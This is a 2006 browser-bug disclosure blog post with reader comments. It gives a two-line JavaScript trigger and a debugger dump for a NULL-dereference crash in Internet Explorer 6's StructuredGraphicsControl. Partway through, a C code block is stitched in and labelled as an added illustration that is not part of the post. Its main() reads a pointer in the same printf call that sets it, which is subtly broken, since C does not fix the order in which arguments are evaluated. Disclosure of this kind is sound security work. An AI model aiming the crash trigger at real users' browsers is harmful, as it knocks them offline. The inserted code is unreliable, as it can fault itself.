Wednesday, July 05, 2006

MoBB #6: StructuredGraphicsControl SourceURL

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug appears to be triggered by a call to URLOpenBlockingStream() with a NULL pointer referenced by the ppStream argument. The only way I found to trigger this bug is by creating the object through the ActiveXObject interface -- using the standard object/classid syntax (as described here) does not result in a crash.

var a = new ActiveXObject('DirectAnimation.StructuredGraphicsControl');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';

Demonstration

eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
urlmon!CBaseBSCB::KickOffDownload+0x7a:
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????
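As an added illustration of the bug class described above (example code, not from this post and not urlmon's own), a small C model of the out-pointer contract: the unchecked form dereferences the out-parameter blindly and would fault on NULL exactly as the dump shows, while the checked form rejects a NULL out-pointer with E_POINTER. The Stream type, the function names and the static instance are constructed for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Stand-ins for the COM conventions involved (real HRESULT values, toy types). */
typedef long HRESULT;
#define S_OK        ((HRESULT)0x00000000L)
#define E_POINTER   ((HRESULT)0x80004003L)   /* COM's "invalid pointer argument" */

/* Toy stream object standing in for the IStream out-parameter (constructed). */
typedef struct {
    char url[64];
} Stream;

static Stream g_stream;   /* single static instance so no allocator is needed */

/* Vulnerable shape: the caller-supplied out-pointer is trusted without a check.
 * With pp_stream == NULL the first store goes through address 0, which is the
 * pattern behind a faulting "mov ecx,[eax]" with eax=00000000. */
HRESULT open_blocking_stream_unchecked(const char *url, Stream **pp_stream)
{
    *pp_stream = NULL;                         /* faults if caller passed NULL */
    strncpy(g_stream.url, url, sizeof g_stream.url - 1);
    g_stream.url[sizeof g_stream.url - 1] = '\0';
    *pp_stream = &g_stream;
    return S_OK;
}

/* Hardened shape: validate every pointer argument before touching it. */
HRESULT open_blocking_stream_checked(const char *url, Stream **pp_stream)
{
    if (pp_stream == NULL || url == NULL)
        return E_POINTER;                      /* reject instead of dereferencing */
    *pp_stream = NULL;
    strncpy(g_stream.url, url, sizeof g_stream.url - 1);
    g_stream.url[sizeof g_stream.url - 1] = '\0';
    *pp_stream = &g_stream;
    return S_OK;
}

int main(void)
{
    Stream *s = NULL;
    /* The property setter path ends up here; a NULL out-pointer is now an error, not a crash. */
    printf("NULL out-param  -> 0x%08lX\n",
           (unsigned long)open_blocking_stream_checked("http://example.invalid/x", NULL));
    printf("valid out-param -> 0x%08lX url=%s\n",
           (unsigned long)open_blocking_stream_checked("http://example.invalid/x", &s), s->url);
    return 0;
}
```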

This bug was reported to Microsoft on March 6th, 2006.
This bug will be added to the OSVDB:
Microsoft IE DirectAnimation.StructuredGraphicsControl SourceURL NULL Dereference

11 Comments:

At 5:46 AM, Anonymous Juano said...

No crash in Opera 9.0 Linux

 
At 6:47 AM, Anonymous web design uk said...

Nice catch! Works

 
At 8:21 AM, Anonymous Kyle said...

Have you tested any of these in IE7? I can't get most of them to do anything (so maybe Microsoft has taken care of them for their next version).

 
At 8:28 AM, Anonymous Anonymous said...

Any NEW exploits or are you just copying and pasting information you found on other sites?

 
At 8:32 AM, Blogger hdm said...

This is a new exploit, the web site reference was provided for background information on what this control is supposed to do (i.e. not crash).

 
At 8:37 AM, Anonymous Anonymous said...

Already fixed on IE 7

 
At 10:24 AM, Anonymous Anonymous said...

When did you report this to Microsoft?
Do you think that they will release a patch next Tuesday, as per their monthly schedule?

 
At 10:30 AM, Blogger hdm said...

This was reported on March 6th as well.

 
At 4:36 PM, Blogger rich_addr said...

Why did you choose to release this bug now? Are you discouraged that MS hasn't fixed it yet, even though you reported it in March?

 
At 4:43 PM, Blogger hdm said...

This is a strange (but common) type of flaw that affects a wide range of ActiveX objects. It was selected for inclusion based on the risk level (low) and simplicity.

 
At 5:49 PM, Anonymous Anonymous said...

Doesn't crash IE7 or IE6. IE6 is most likely unaffected because I do not have the relevant ActiveX control on my system.

 